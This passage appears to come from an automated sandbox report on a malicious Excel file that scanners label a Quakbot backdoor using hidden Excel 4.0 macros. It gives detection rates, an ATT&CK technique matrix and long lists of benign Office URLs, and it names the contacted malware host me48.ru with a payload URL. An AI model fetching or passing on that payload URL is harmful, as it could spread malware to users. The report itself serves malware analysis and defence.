    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: regsvr32.exe, 00000001.00000002.229081324.0000000003300000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000001.00000002.229081324.0000000003300000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000001.00000002.229081324.0000000003300000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000001.00000002.229081324.0000000003300000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1444032431.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1444032431.xls35%VirustotalBrowse
    document-1444032431.xls14%MetadefenderBrowse
    document-1444032431.xls45%ReversingLabsDocument-Word.Backdoor.Quakbot

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    me48.ru1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    http://me48.ru/ds/231120.gif0%URL Reputationsafe
    http://me48.ru/ds/231120.gif0%URL Reputationsafe
    http://me48.ru/ds/231120.gif0%URL Reputationsafe
    http://me48.ru/ds/231120.gif0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    me48.ru
    188.225.24.87
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://me48.ru/ds/231120.giffalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
      high
      https://login.microsoftonline.com/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
        high
        https://shell.suite.office.com:1443CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
              high
              https://cdn.entity.CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                high
                https://wus2-000.contentsync.CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkeyCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                    high
                    https://powerlift.acompli.netCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                      high
                      https://cortana.aiCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                high
                                https://api.aadrm.com/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                      high
                                      https://cr.office.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                            high
                                            https://graph.ppe.windows.netCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                            high
                                                            https://graph.windows.netCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/iosCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmediaCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/ActivitiesCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.netCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policiesCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocationCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/logCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                      high
                                                                                                                      https://ncus-000.contentsync.CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.windows.net/common/oauth2/authorizeCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/importsCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.comCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileCD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v2CD757FD3-0BC4-48FD-8B4E-C4F841C67511.0.drfalse
